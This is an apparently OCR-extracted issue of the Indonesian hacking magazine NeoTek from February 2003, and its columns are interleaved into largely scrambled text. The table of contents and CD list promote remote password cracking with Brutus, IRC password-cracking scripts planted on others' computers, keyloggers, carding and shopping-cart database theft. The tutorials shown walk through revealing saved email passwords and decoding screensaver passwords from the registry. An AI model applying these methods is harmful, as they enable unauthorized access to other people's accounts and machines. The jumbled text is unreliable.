Está en la página 1de 50

NeoSoft

amkm
dari Anda untuk Anda
Permintaan itu makin banyak dan variatif

Jika anda mengirim permintaan sehingga isi suatu CD penuh—


pesan email amkm bulan-bulan berikutya. Tetapi sebenarnya
(anda meminta, kami bukan hanya anda yang memperoleh software
men-download) kepada yang berguna, melainkan pembaca NeoTek lain
kami, anda akan pun “kena getahnya.”
memperoleh perangkat Jadi jangan ge-er bahwa anda egois karena
lunak yang anda minta telah mengirim pesan email amkm kepada
download-kan itu lewat kami, tetapi boleh ge-er karena telah
CD NeoTek bulan membantu sesama NeoTeker mendapat
berikutnya atau kadang—karena banyaknya software berguna. Gitu!

Netscape 7.0 adalah salah satu hasil software • Tabbed browsing


permintaan anda yang kami muat pada CD • Full screen mode
NeoTek bulan ini. • Pop-up control
Sebagai salah satu browser pesaing utama • Click to search
Internet Explorer, Netscape 7.0 mendapat • Print preview
pembaruan yang berarti, Di antaranya pada: Netscape Mail
Netscape Navigator • Quick search
• Quick launch • Mail label
• Bookmark groups • Mail alerts
• Easy filter setup
• Easy importing from other mail program
#1 Instant Messenger
• Easy buddy list access
• File transfer
HomePage

amkm Salam!
anda Bongkar!
meminta Password sana, password sini.
kami
mendownload
Software gratis
di Internet?
Tapi besarnya...
50Mb... 200Mb?

sa—elephant • Perangkat lunak password cracker Brutus dapat digunakan untuk mengetahui kata
sandi komputer dari jarak jauh (remote computer) lewat sambungan Internet. Anda
cukup memasukkan IP komputer sasaran. Hasilnya dapat anda lihat di atas. Baca

sa—gajah NeoTek nomor ini halaman 12.

rek (crack) bukan hanya bunyi pintu dibongkar pen-


Kami dapat
men-
K curi, tetapi bisa juga menjadi cara penghuni dunia
bawah atawa underground menggangsir password,
download- berbagai macam dan rupa kata sandi (password).
kannya NeoTek nomor ini kembali menyajikan cara menguak pass-
untuk anda. word: email account, screensaver, pcAnywhere, remote
computer, serta nick dan channel IRC. Mudah-mudahan
Kirimkan email ke: cukup membantu anda untuk menggunakannya secara positif.
kosasih_iskandarsjah@yahoo.com
dengan: Redaksi
• Subject: amkm redaksi@neotek.co.id
• Isi pesan: Mohon download-kan
[nama software] dari
[www.blablabla.com] Bagaimana menghubungi N EOTEK?
KONTRIBUSI ARTIKEL
redaksi@neotek.co.id ADMINISTRASI IKLAN
SURAT PEMBACA Tel. 021-5481457 Fax. 021-5329041
support@neotek.co.id SIRKULASI NEOTEK
WEBMASTER Tel. 021-3854764
webmaster@neotek.co.id ALAMAT REDAKSI
PEMASARAN Gedung Cahaya Palmerah Suite 506
pemasaran@neotek.co.id Jl. Palmerah Utara III No. 9
Jakarta 11480
CHATROOM DI DALNET
#neoteker
MILIS PARA NEOTEKER
http://groups.yahoo.com/group/majalahneotek

Februari 2003 NeoTek 1


Daftar Isi

Daftar Isi NeoTek Vol. I I I No. 5


46 Connectix Virtual PC
NeoStart NeoTutor Instalasi Mesin Maya
Program yang asalnya dari
dunia Macintosh ini kini tersedia pula
SandiYudha—Cached VMware Workstation
7 Password Revealer 41 untuk Linux
untuk Windows. Anda kini dapat men-
coba berbagai macam sistem operasi
SandiYudha dapat memperli- Instalasi VMware untuk Linux serta berbagai macam sistem operasi
hatkan karakter asli untuk sebuah menggunakan skrip Perl dan tidak se- pada sistem Windows anda. Tersedia
password dengan cara yang mudah. mudah di Windows. versi Windows dan Mac.

Membongkar Enkripsi Connectix Virtual PC


8 Screensaver Password 48 Instalasi Guest OS
Iktui cara mengungkap kata Berbeda dengan VMware,
sandi suatu screensaver secara manual Connectix Virtual PC pada dasarnya
dengan menggunakan bantuan kode menyiapkan dulu hard disk image dari
ASCII. suatu mesin maya. Pada hard disk
image inilah anda menginstalasi guest
pcAnywhere Pass View OS apa saja. Termasuk Windows, Mac,
11 untuk pcAnywhere Linux, Solaris, OS/2, atau BSD
Jika anda lupa password
Kontra Spionase
pcAnywhere anda, pcAnywhere Pass
View dapat membantu anda menguak NeoStyle 26 dengan Anti-Keylogger
password yang terlupa itu. Kegiatan spionase keylogger
dapat ditangkis dengan program Anti-
Keylogger Sebagai Keylogger.
12 Meng-crack Password
Komputer Remote
24 Spion
Menggoda dengan
Tanpa harus mendapat akses
PC Acme Net sebagai keylogger
yang dipasang di komputer anda dapat
28 Fake JavaScript
langsung pada komputer, Brutus dapat JavaScript dapat dipalsukan
digunakan orang lain untuk memata-
digunakan untuk membongkar untuk memberikan kejutan kepada
matai semua kegiatan berkomputer anda.
password komputer remote. pengunjung suatu situs Web.

www.neotek.co.id
Situs NeoTek neotek.kpone.com.sg 31 Mengais Password
Nick & Channel IRC
Wicked IRC Password Cracker
Jadikan situs NeoTek sebagai pangkalan Anda berselancar
dapat digunakan untuk membongkar
Link Langsung Layanan Rupa-rupa NeoTek kata sandi nick dan channel di IRC.
Kunjungi situs-situs yang dibahas di Perlengkapan berinternet dari situs NeoTek
majalah NeoTek dengan sekali klik
Skrip Pembongkar
lewat situs NeoTek. Channel #neoteker di Dalnet
Ngobrol ramai-ramai sesama NeoTeker 34 Password Nick
NeoTek versi PDF Web Chat Room Gunakan skrip yang dapat dita-
Kehabisan NeoTek di kota Anda? Kini tidak usah jauh-jauh untuk ngobrol namkan di komputer orang lain untuk
Dapatkan saja versi PDF-nya. Gratis! langsung dengan sesama NeoTeker membongkar password nick di IRC.
Mailing List
Download Bongkar Paksa
Tersedia juga download di situs
NeoTek selain dari situs aslinya
Ini yang paling ramai. Segera ikutan
berbagi pengalaman berinternet! 36 Password Nick
NeoTeker Official Portal Metode brute force digunakan
http://neotek.portal.dk3.com untuk membongkar password nick dan
Situs komunikasi antar Neoteker. channel di IRC.

2 NeoTek Februari 2003


Daftar Isi

NeoSoft
FOKUS BULAN INI Netscape 7.0
0 Versi terakhir browser pe-
saing Internet Explorer ini
dilengkapi fitur-fitur baru
yang berguna untuk
aktivitas Internet anda.

NeoProfil
Kru NeoTek
3 Bermarkas di
Gedung Cahaya Palmerah 503
Mengusung Jl. Palmerah Utara III No. 9
Jakarta 11480
VoIP Merdeka Telp. 021-5481457
Fax. 021-5329041

Pemimpin Umum
e-Commerce Security:
NeoTekno 28 Modus Operandi Carding
Fachri Said
Pemimpin Redaksi
Mengamati ‘dari dalam’ cara
Kosasih Iskandarsjah
kerja carder yang mencakup pencurian
VoIP Merdeka database selain credit card fraud. Redaktur Ahli
14 Membangun Telkom Onno W. Purbo
Michael S. Sunggiardi
Sendiri e-Commerce Security:
Teknologi open source sekarang sudah 30 Kelemahan cart32.exe Pemimpin Usaha
memungkinkan kita membangun jaringan Bahasan teknis cara ‘memanen’ Fahmi Oemar
telepon sendiri, baik itu berjalan terpisah database dari aplikasi shopping cart Ridwan Fachri
maupun diintegrasikan dengan jaringan yang populer, cart32..exe. Shoppinmg Redaktur Pelaksana
telkom yang ‘resmi.’ Bahasan komprehensif cart ini mempunyai kelemahan fatal. Gianto Widianto
baik untuk pemakai biasa maupun pe- Dadi Pakar
nyedia fasilitas VoIP gateway. e-Commerce Security:
Proyek Digital Clock (5)
32 Kelemahan shopper.cgi
Sekretaris Redaksi
Elvy Risma Nainggolan
18 Artikel lanjutan advanced digital
Eksploitasi aplikasi shopping
cart dengan memanfaatkan unicode
Dewan Redaksi
clock berupa penjelasan cara David Sugianto,
bug untuk ‘memanen’ database yang
kerja program NeoClock2.asm. Asmuri Anwar, MA Rody C.
ada di dalamnya.
Webmaster
NeoTek Maret 2003 Supriyanto
Inbox Perl dan Perl Exploit
Pemasaran
Hedhi Sabaruddin
NmN Exploit selain dalam format C,
6 Neoteker menjawab Neoteker
Khusus VoIP Merdeka
banyak juga yang tersedia sebagai
Perl script. Pelajari Perl (pada
Tuti Sundari, Arinto
Iklan dan Promosi
Windows maupun Linux) sebelum Elvy Risma Nainggolan
NeoRagam mencoba exploit-nya. Keuangan
Aswan Bakri
Ada Apa di CD NeoTek? Menjebol Forum
4 Linux Pocketbook 2003 PHP Bulletin Board
VoIP Merdeka Selain aplikasi portal seperti PHP Bank
Nuke atau Postnuke, masih banyak
Bank BNI
Daftar Isi CD NeoTek terdapat aplikasi lain yang berbasis
5 PHP, seperti misalnya phpBB (PHP
a.n. PT NeoTek Maju Mandiri
No. rekening 070.001709720.001
Bulletin Board) ini. Sayang, aplikasi-
aplikasi ini tidak luput dari vulner- Bank BCA KCP Rawamangun
abilities sehingga rawan dijebol. a.n. Aswan Bakri
No. rekening 0940544131

Februari 2003 NeoTek 3


NeoRagam

Ada Apa di CD NeoTek?


CD NeoTek VoIP Merdeka merupakan bahasan utama kali ini yang pada dasarnya
Februari 2003 adalah menyiapkan sarana telekomunikasi mandiri untuk rakyat dengan
menyiapkan ‘sentral telepon’ berupa gatekeeper.

LI N U X POC K ETBOO K 2003


haman apa itu Linux, instal- serta security pada Linux.
asi distro-distro populer Bahasan ditutup dengan
yang mencakup cara mem- Linux multimedia yang
partisi hard disk, teknik boot mencakup juga games yang
ke dalam Linux, sampai mu- berjalan pada sistem Linux.
lai menjalankan serta meng-
konfigurasi Linux. Satu lagi yang penting dan
assword cracking banyak ditanya orang tetapi
P kembali mendapat
perhatian. Dimulai
Untuk pemula, bahasan me-
ngenai shell operation cukup
jarang dibahas, justru ada di
Linux Pocketbook ini. Cara
dengan memperkenalkan memadai. Mulai dari perin- meng-uninstal Linux!
SandiYudha, karya salah tah-perintah dasar untuk
seorang neoteker yang sama navigasi Linux, file permis- Referensi akhir pun sangat
fungsinya dengan Snadboy’s sion, mounting file system, bermanfaat. Mencakup file-
Revelation dan dilanjutkan instalasi aplikasi baru, sam- file apa saja dan ada di ma-
dengan cara manual meng- pai kompilasi kernel! na yang digunakan untuk
crack screen saver password. konfigurasi Samba, LILO, X
inux pocket Book 2003 Selanjutnya dibahas pula Window, maupun runlevel.
Perhatian khusus dalam
password cracking justru L adalah cara terbaik
untuk mempelajari
struktur direktori dalam
Linux, cara menghubung- Buku kecil yang benar-
terhadap nick dan channel Linux, mulai dari pema- benar bermanfaat!
password pada mIRC. kan Linux dengan Windows,
Diperkenalkan tool siap
pakai seperti Wicked IRC
Password Cracker, selain
VoI P Merdeka
membuat skrip sendiri Netmeeting (Windows)
untuk melaksanakan hal XNetmeeting 3.01
tersebut. XNetmeeting GSM Codec
Karena besarnya minat
terhadap virtual PC se- GnomeMeeting (Linux source)
menjak artikel tentang Xgnomemeeting-0.9.41.tar.gz
VMware for Windows, Xopenh323_1.9.10.tar.gz
NeoTek membahas kem- Xpwlib_1.3.11.tar.gz
bali VMware. Kali ini un-
tuk sistem operasi Linux. esuai permintaan para neoteker GnomeMeeting Packages
Selain itu dibahas pula S untuk ikut serta dalam jaringan
VoIP Merdeka di tempat masing-
XDebian Packages (3 files)
XMandrake Packages (3 files)
Connectix Virtual PC for
Windows yang berasal masing, pada CD NeoTek kali ini disediakan XRedHat Packages (3 files)
dari dunia Macintosh. perangkat-perangkat yang dibutuhkan, XSlackware Packages (6 files)
khususnya yang terlah terbukti berhasil XSuSE Packages (3 files)
Dalam hal security dibahas diujicobakan oleh tokoh utama VoIP
keylogger maupun anti- Merdeka, Onno W. Purbo. Gatekeeper (Windows)
keylogger, serta Xgk-2.0.2-windows-bin.zip
Di sini pemakai akhir VoIP hanya perlu
e-commerce security, Xopengk_20030106_win32.zip
yang mencakup bahasan menginstal Netmeeting (untuk pemakai
cara carder memanen Windows) atau Gnomemeeting (untuk Gatekeeper (Linux)
informasi transaksi (ter- pemakai Linux). Khusus untuk Gnome- Xgk-2.0a-linux.bin.tgz (Mdk 8.0)
masuk nomor credit card) meeting, sebelumnya perlu diinstal terlebih Xgk-2.0.2-linux-bin.tgz (Mdk 9.0)
dari situs-situs online dahulu Openh323 dan Pwlib. Xopengk_20030107_linux_x86.tar.gz
shopping dengan meman- Apabila pemakai akhir terhubung ke Internet
melalui proxy server, seperti pada LAN di OpenH323 Gatekeeper Java GUI
faatkan kelemahan-kele-
mahan yang ada pada warnet, kantor, atau sekolah, maka pada pada Xgkgui06.tgz (Unix tar archive)
aplikasi shopping cart. proxy server perlu diinstal gatekeeper. Xgkgui06.zip (Windows zip archive)

4 NeoTek Februari 2003


NeoRagam

daftar isi cd neotek


ANTI VIRUS LINUX Adhit Recca
Clam Anti Virus clamav-0.22.tar MySQL Control Center mysqlcc-0.8.7-win32.zip
Kapersky Antivirus kavwselinux-4.0.2.2 MySQL Manager mysqlmanager.zip
JSoft Secman for MySQL 1.0 secman.zip
ANTI VIRUS WINDOWS Adi
Bit Defender Anti Virus bd_icq.exe IncrediMail Upgrade IncrediMailSetupU.exe
NAV Definitions 9 Jan. 2003 20030109-006-i32.exe IncrediMail IncrediMailSetup.exe
Outlook 2000 Sec. Update out2ksec.exe
Worm Detector wd_setup.exe Fanni Widodo
MySQL 3.23 MySQL-3.23.53a-1.i386.rpm
JAVASCRIPT TOOLS MySQL 3.23 MySQL-3.23.53a-pc-linux-gnu-i686.tar.gz
ACE HTML AceHTML.exe PHP php-4.2.3.tar.gz
CSE HTML Validator csesetup.exe PHP Nuke PHP-Nuke-6.0.tar.gz
FirstPage 2000 1stpage.zip Frans Maramis
IE Debugger IE4DB.exe Open Office 1.01 Linux OOo_1.0.1_LinuxIntel_install.tar.gz
JavaScript It! jsit202f.zip
JavaScript Scrambler scram111.zip Imam
Netscape JavaScript Debugger JSD11SU.jar Picture Manager Trial 4.02 picman42.zip
Primal Script Primal.exe ReadPlease setupreadplease2003.exe
Kulonuwun
KEYLOGGER PowerDesk 5 pd5free.exe
Acme Net Keylogger pca_net.zip Abi Word 1.03 setup_abiword.bidi.1-0-3.exe
Anti Keylogger 2.2 antikey.zip AdAware 5.83 aaw.exe
E-BOOK Axialis Prof. Screen Saver Prod axscrprod.exe
Linux Pocket Book 2003 LPB2003.pdf EZ Antivirus EZAntivirus.exe
WindowBlinds wb341_pub.exe
PASSWORD CRACKING WinKey winkey.exe
Brutus Remote Cracker brutus-aet2.zip Mythinky
IRC Cracker irc_cracker.zip WS FTP Limited Edition ws_ftple.exe
pcAnywhere 10.10 Trial pcATrialv10.exe WS FTP Pro (40 Bit SSL) WS_FTPPro_eval.exe
pcAnywhere Any Pass pcanypass.zip
Sandi Yudha SandiYudha.zip Rendra Sitorus
Nvidia Driver NVIDIA_GLX-1.0-2313.i386.exe
PROGRAM UMUM R. Sugianto
Win Media Player 9 ME 9x MPSetup.exe Accounting Plus accplus.exe
Win Media Player 9 XP MPSetupXP.exe Atrise HTMLock 1.9.3 htl.zip
WinZip 8.1 winzip 81.exe DivX 5.0.2 Pro DivXPro502GAINBundle.exe
PROYEK Mpeg Layer-3 Codec 1.263 ra-codec12.zip
Fake Crash Spybot—Search & Destroy spybotsd11.exe
Fake Format Virtual Dub VirtualDub-1_4_10.zip
Nick Password Cracker (Skrip) Rudy Hartono
McAffee Uninstaller UNIENU65D30.exe
VIRTUAL PC Netscape 7.0 NSSetup.exe
Connectix Virtual PC Trial VPC_51_Trial.exe
VMWare 3.1.1 Linux VMwareWorkstation-3..1.1-1790.tar.gz Ronald Willem
J2RE 1.4.1 Win j2re-1_4_1_01-windows-i586.exe
VOIP MERDEKA J2SDK 1.4.1 Win j2sdk-1_4_1_01-windows-i586.exe
Panduan Pembangunan Jaringan VoIP Merdeka.pdf Sageayu
Netmeeting 3.01 NM30.exe MPlayer MPlayer-0.90pre10.tar
Netmeeting GSM Codec instcodec.exe
GnomeMeeting source gnomemeeting-0.9.41.tar.gz Teguh Asma
GnomeMeeting Debian 3 files WineX 2.2 winex22.tar.gz
GnomeMeeting Mandrake 3 files Tiyok Agatha
GnomeMeeting RedHat 3 files Cubase SL Update_cubase_SL_1031.exe
GnomeMeeting Slackware 6 files Cubase SX Update_cubase_SL_103.exe
GnomeMeeting SuSE 3 files Nuendo 1.61 Nuendo_161_Patcher.exe
Gatekeeper Mandrake 8.0 gk-2.0a-linux-bin.zip Wave Lab WaveLab_400g_patch.zip
Gatekeeper Mandrake 9.0 gk-2.0.2-linux-bin.zip Ulul
Gatekeeper Windows gk-2.0.2-windows-bin.zip Flightgear fgfs-win32-bin-0.9.1c.zip
OpenH323 Java GUI tarball gkgui06.tgz Websell
OpenH323 Java GUI zip gkgui06.zip Real One Player RealOnePlayerV2GOLD.exe
AMKM
Abdul Aziz
Klondike 1.5 Win kl_wap15.zip
Klondike Handheld PC2000 setup.exe
Klondike Pocket PC 2002 setup.exe
M3 Gate 1.2 m3stp12.exe
M3 Gate 1.2 Pocket PocketM3Gate1_2b.exe
PIC2WBMP 1.0 pic2bmp.zip
EasyPad WAPtor 3.0 waptor3.exe
WinWAP 3.1 Pro WinWAP3P.exe
WinWAP Cassiopeia BE300 wwce12be300.exe
WinWAP Pocket PC Trial winwapce12.exe

• Cubase SL, software untuk pemusik ketika melakukan rekaman di studio.

Februari 2003 NeoTek 5


Inbox

NmN
Khusus VoIP Merdeka
Forum ini dimaksudkan sebagai bentuk offline dari mailing list
NeoTek di http://groups.yahoo.com/group/majalahneotek.

VoIP Perjuangan nya berupa sebuah HP Net- atau handphone dari nomor atau gimana?
Kang Onno Server Pentium Pro 200 de- voip? Vice versa ??? Wahyu Budi
ngan memory 128Mbyte
Posted January 8 dengan harddisk 2Gbyte Terima kasih en maaf kalo wbudi@satelindo.co.id
Maaf nyepam :( ... menjalankan Linux Man- nyerocos ... maklum... udik ;)
J: Posted January 8
Atas rahmat Allah SWT. drake 9.0 dengan openh323 Sulchan
gatekeeper 2.0.2. Tul jadi 0111542
Atas perjuangan rekan Johar msdarmawan@clivarindo.org
Alam dan Adi di IIX. Atas Yah mudah-mudahan bisa Onno W. Purbo
sumbangan dan dukungan J: Posted January 8
membantu sedikit meringan-
rekan-rekan APJII & IIX kan penderitaan bangsa > apakah yg saya lakukan T: Posted January 8
Indonesia ... udah benar? Sesuai usulan rekan-rekan
Pada siang ini 8 January 2003
Betul .. terutama di Genetika, Ja-
Gatekeeper APJII di IIX dengan Sekali lagi terima kasih ba- ringan VoIP Perjuangan
nomor IP [202.148.63.18] nyak sekali untuk rekan Johar > kalo saya sudah registrasi diusukan berganti nama
yang didedikasikan untuk Alam, Adi, Heru Nugroho, nomor ini, berarti ini sudah menjadi Jaringan VoIP
registrasi endpoint-endpoint APJII, IIX dll yang rela me- menjadi nomor saya? Atau Merdeka!!! agar tidak
VoIP perjuangan dengan no- ngorbankan resource-nya hanya pada saat online ? dihubungkan dengan partai
mor akses perjuangan 0111 untuk bangsa ini :) ... Hanya pada saat online aja .. yang berkuasa ‘n tidak
xxxxxxxx sudah dapat Onno W. Purbo
> berarti pemilik nomor dipolitisir sebagai usaha partai
beroperasi dan digunakan. Indonesian VoIP MaverickNet:
voip harus online 24 jam? yang berkuasa. Pengguna
Anda dapat menggunakan 01110214204701 (ITG/home) VoIP Merdeka!!! dapat me-
gatekeeper APJII [202.148.63.18] 01110214204701 (laptop/home) Engga juga .. registrasikan diri ke gate-
untuk meregistrasi endpoint 01110214208888 (laptop/mobile) > apakah saya bisa menghu- keeper menggunakan Net-
anda (NetMeeting dll) un- bungi nomor telepon biasa Meeting ke 202.148.63.18,
tuk bisa berkomunikasi me- To the Point, Aja... atau handphone dari nomor dengan prefix 0111888.
lalui Internet dan tergabung T: Posted January 8 voip? Vice versa? Mohon menggunakan prefix
dalam jaringan VoIP perjuangan. To the point Pak Onno, saya Kalau ada gatewaynya bisa .. 0111888 untuk nomor
Saya yakin pengorbanan melakukan sbb: telepon enduser supaya para
Onno W. Purbo operator gatekeeper tidak
yang dilakukan oleh APJII 1. Dial-up menggunakan
dan IIX akan sangat mem- onno@indo.net.id pusing kepala melakukan
telkomnet
bantu rekan-rekan yang 2. open netmeeting (tools - routing nomor telepon-nya ..
sangat mendambakan tele- Untuk Luar Negeri? Merdeka!!!
options-advanced calling)
pon via Internet dengan tarif 3. gatekeeper setting: T: Posted January 8 Onno W. Purbo
amat sangat murah. Sialnya, • use gatekeeper to place Apa gatekeeper ini bisa dipake Advertisement
mohon dicatat bahwa jaring- calls (checked) saya isi juga sama orang yang tinggal Posted January 12
an 0111 ini tidak bisa dihu- 202.148.63.18 di luar negeri? Contohnya di
bungi dari Telkom, maklum • log on using my account Belanda/ Jerman. Maksudnya Hasil diskusi para operator
kan jaringan ini hanya ja- name (unchecked) biar gampang konek dan bisa gatekeeper VoIP Merdeka!!!
ringan VoIP perjuangan :) • og on using my phone online sama sama.. • area code tidak boleh ada
Yah, tapi lumayanlah buat number (checked) saya angka NOL (takutnya be-
isi 01110218499001 The 10th
ngomong sampe berbusa .. rabe waktu SLI) jadi Jakarta
4. saya coba new call en call- d10th@telkom.net
Kalau ada masalah silahkan ing dua nomor pak onno, 011121, Bandung 011122
complain kepada saya :( .. J: Posted January 8 • pengguna NetMeeting
kayaknya pak onno lagi
diskusi lebih lanjut silahkan off line ya ??? atau ...?? Engga bisa ..Gatekeeper ini yang log ke
melalui mailinglist adanya di IIX di Indonesia Engga • 202.148.63.18 -
genetika@yahoogroups.com Apakah yg saya lakukan udah gunakan prefix 0111888
benar? Kalo saya sudah diroute buat keluar negeri
panduan/cara menggunakan • 202.159.123.162 -
registrasi nomor ini, berarti Onno W. Purbo gunakan prefix 0111251
jaringan VoIP perjuangan ini sudah menjadi nomor sa-
silahkan dilihat dari pandu- onno@indo.net.id • 202.43.162.189 - sedang
ya? Atau hanya pada saat on- ditanyakan ke yang
an VoIP Perjuangan yang line? Berarti pemilik nomor Kode Area
bisa di download di punya gatekeeper
voip harus online 24 jam? T: Posted January 8
www.bogor.net/idkf/ Onno (0111214204701 -
Sedikit informasi teknis me- Apakah saya bisa menghu- Klo yg kode area-nya pake
sin gatekeeper APJII ini ha- bungi nomor telepon biasa 0542, apakah jadi 542 aja Answering Machine)

6 NeoTek Februari 2003


NeoStart

PASSWORD CRACKING
ada Sistem Operasi Windows banyak
P aplikasi yang membutuhkan password.
Anehnya, sebagian aplikasi tersebut
tetap meninggalkan karakter password pada

SANDIYUDHA–CACHED kotak Password-nya, hanya disamarkan dengan


deretan karakter asteriks (*) atau yang lainnya.
Tetapi di balik itu karakter aslinya tetap tertera.

PASSWORD REVEALER Hal ini dapat dijumpai pada Dial-up Connection


bila kita akan membuka koneksi ke Internet,
dan Outlook Express pada bagian Email Account
Properties. Mata bisa ditipu, tetapi lain halnya
Selain Snadboy’s Revelation untuk mengungkap password dengan program. Dengan SandhiYudha, karak-
yang ada di balik tanda asterisk, kini sudah ada Sandiyudha ter asterisk tersebut dapat disingkap sehingga
anda dapat mengetahui karakter aslinya. Ikuti
karya Cakrabirawa (cakrabirawa@mail.ru) yang menyajikan langkah-langkah berikut ini untuk menyingkap
fungsi serupa. password pada email account properties milik
Outlook Express.

Ada apa di balik password email account anda?

MENGAMBIL SANDIYUDHA DOWNLOAD & EKSTRAKSI JALANKAN OUTLOOK EXPRESS


1 Jalankan browser IE atau yang lain.
Ketikkan 'http://come.to/digital-
2 Setelah proses download selesai,
ekstrak paket zip tersebut ke sem-
3 Sebagai contoh kasus, jalankan pro-
gram Outlook Express. Klik menu
works' pada kotak Address. barang folder, misalnya ke My Tools → Accounts. Klik ganda salah
Kemudian klik link 'Cool Stuff'. Klik Documents. Paket zip tersebut satu email account. Pada kotak
kata SandhiYudha untuk men- terdiri dari 2 file yaitu file Read- Properties pilih tab Server. Akan
download program SandhiYudha. me.txt dan SandhiYudha.exe. tampak deretan karakter (x) pada
kotak Password.

JALANKAN SANDIYUDHA KURSOR PADA PASSWORD NO DISGUISE


4 Masuklah ke folder My Documents\
SandhiYudha, tempat anda meng-
5 Untuk menyingkap karakter asli di
balik karakter (x), Anda cukup
6 Beri tanda cek pada 'No disguise
character', kemudian arahkan point-
ekstrak paket zip pada Langkah 2. menggerakkan pointer mouse ke er mouse pada kotak Password di
Klik dua kali untuk menjalankan arah kotak Password pada Email Email Account Properties. Bila anda
program SandhiYudha. Account Properties. Karakter asli klik di kotak tersebut, maka karakter
akan diperlihatkan pada kotak (x) akan berubah sesuai karakter
'Code' program SandhiYudha. aslinya.

Februari 2003 NeoTek 7


NeoStart

PASSWO R D C R AC K I N G
Membongkar Enkripsi
Screensaver Password
NeoTek September 2002 telah membahas cara meng-crack screensaver password dengan bantuan
e. Kini David Sugianto (davidsugianto2002@yahoo.com) mengajak anda
program 95sscrk.exe
melakukan cracking secara manual. Cracking ini menggunakan bantuan kode ASCII.

ENGAPA ANDA PERLU MENGUASAI CARA meng-crack sebelumnya, centang kotak check box Password pro-
M kata sandi screensaver? Karena jika komputer ter-
pasang screensaver yang dilengkapi dengan kata
tected. Lalu klik tombol Change di sebelahnya.
6. Masukkan password yang anda inginkan pada kedua
sandi, dan sewaktu-waktu anda lupa akan kata sandi ter- kotak yang tersedia. Dikedua kotak tersebut, anda ha-
sebut, maka anda tidak akan dapat masuk ke desktop rus mengetikkan kata sandi yang sama. Karena saya
Windows tersebut dan harus me-restart ulang komputer akan membahas mengenai cara cracking kata sandi,
lalu menonaktifkan screensaver. Sebenarnya alasan itu mungkin sebaiknya kata sandi kita samakan terlebih
kurang masuk akal, bagi saya pribadi alasan mempelajari dahulu agar mudah memahaminya. Kata sandi yang
cracking screensaver adalah hanya untuk kesenangan. saya gunakan adalah “DAVID.” Harap diingat kata
Karena saya menganggap cracking itu adalah suatu seni. sandi yang saya gunakan terdiri dari huruf besar
Walaupun artikel ini membahas masalah cracking, namun semua. Klik OK untuk keluar dari kotak tersebut.
bukan berarti artikel ini hanya ditujukan untuk yang su-
dah berpengalaman atau mahir dalam melakukan cracking.
Artikel ini saya buat sebenarnya ditujukan untuk para
pemula yang ingin mencoba terjun ke dunia crack.

Memberikan kata sandi pada screensaver


Seperti telah disinggung di atas, artikel ini untuk pemula.
Maka sebelum mulai meng-crack, anda perlu mempelajari
cara memberikan kata sandi pada screensaver. Bagi anda
• Memasukkan kata sandi.
yang sudah memahaminya, silakan melewati topik ini dan
menuju ke bagian Meng-crack kata sandi screensaver. 7. Jika terdapat pesan bahwa password anda telah berhasil
Untuk memberi kata sandi pada screensaver, langkah- diuubah, klik tombol OK.
langkah yang perlu anda lakukan adalah: 8. Klik OK pada kotak dialog Display Properties untuk
menutupnya.
1 Klik kanan pada desktop Windows anda. 9. Anda telah selesai memberikan passwrod pada screen
2 Pada menu Pop-up, pilih Properties. saver di komputer anda.
3. Pada kotak dia-
log Display Pro- Meng-crack kata sandi screensaver
perties, klik tab Setelah screensaver diberi kata sandi, kini kita akan men-
Screen Saver. coba meng-crack kata sandi tersebut. Dalam artikel ini
4. Pada kotak saya hanya mencoba cracking hingga 14 karakter. Artinya,
dropdown, pilih pembahasan dalam artikel ini hanya efektif jika jumlah
screensaver karakter kata sandi tersebut kurang dari 14 karakter. Wa-
yang sesuai laupun begitu, jangan kecewa dulu, jarang sekali user mem-
dengan selera berikan kata sandi screensaver dengan banyak karakter.
anda. Pada Lagipula artikel ini sebenarnya hanya untuk proses belajar.
artikel ini saya
memilih Kini kita akan mulai meng-crack kata sandi. Jika lupa kata
Baseball untuk sandi pada screensaver, anda dapat melihatnya di registry
screensaver di Windows. Caranya: Buka editor registry, klik Start →
komputer saya. Run lalu ketikkan Regedit. Pada segmen HKEY_USERS\
5. Di bawah kotak .DEFAULT\Control Panel\Desktop terdapat key Screen-
dropdown Saver_Data di panel sebelah kanan. Klik ganda key ter-
tempat anda sebut. Akan muncul kotak Edit Binary Value. Pada kotak
memilih itu terdapat karakter 0CAF205423. Itulah password screen
screensaver saver anda yang telah dienkripsi.
• Kotak Dialog Properties.

8 NeoTek Februari 2003


NeoStart

Yang dimaksud enkripsi disini ialah bahwa password se- Masih bingung dengan proses perhitungan dengan meto-
benarnya (DAVID) telah dijadikan bilangan HEX atau de XOR hingga mendapatkan hasil tertentu? Kini akan
dienkripsi oleh Windows. Oleh karena itu, untuk menam- saya bahas lebih dalam:
pilkan password yang sebenarnya, kita harus melakukan Bilangan yang akan dibandingkan adalah bilangan biner da-
dekripsi bilangan HEX tersebut. ri 0 yaitu 0000 0000. Lalu saya menggunakan tabel enkripsi
Seperti yang telah anda ketahui, pada saat membuat kata untuk membandingkannya. Tabel enkripsi yang saya guna-
sandi screensaver, saya memberikan password DAVID. kan ialah baris pertama di kolom kiri yaitu 0000 0100.
Kata tersebut terdiri dari 5 karakter. Namun lihatlah kata Mengapa saya mengambil yang berada di baris pertama
sandi yang telah dienkripsi 0CAF205423 terdiri atas 10 pada tabel enkripsi? Karena karakter yang akan kita des-
karakter. Dapat disimpulkan bahwa sepasang bilangan kripsikan ialah karakter pertama, jadi tiap baris mewakili
HEX mewakili setiap karakter yang sesungguhnya. Oleh urutan karakter. Baris 1 untuk karakter pertama, baris ke-
karena itu, kita harus membagi bilangan HEX tersebut 2 untuk karakter ke-2, dsb. Lalu mengapa terdapat kolom
terlebih dahulu dua-dua, yaitu 0C, AF, 20, 54, 23. Atau sebelah kiri dan sebelah kanan? Karena seperti yang su-
dapat juga disimpulkan: dah disebutkan sebelumnya, setiap karakter sebenarnya
0C mewakili D (karakter pertama) diwakili dengan 2 bilangan HEX. Seperti karakter D diwa-
AF mewakili A kili bilangan HEX 0 dan C. Karena kita baru membahas
20 mewakili V bilangan HEX 0, maka tabel enkripsi yang digunakan
54 mewakili I ialah baris pertama dan kolom sebelah kiri.
23 mewakili D (karakter terakhir)
Lalu bagaimanakah cara perhitngan dengan mengunakan
Jika melihat pembagian di atas, maka mungkin timbul per- metode XOR? Sebenarnya caranya cukup mudah, lihatlah
tanyaan: “Mengapa karakter D pertama dan karakter D lagi tabel XOR diatas. Proses perhitungan dilakukan
terakhir tidak diwakili oleh bilangan HEX yang sama (yang dengan cara membandingkan bilangan biner dengan tabel
pertama diwakili 0C dan yang terakhir diwakili 23) padahal enkripsi. Ingat :
sama-sama karakter D?” Jawabnya akan anda temukan jika
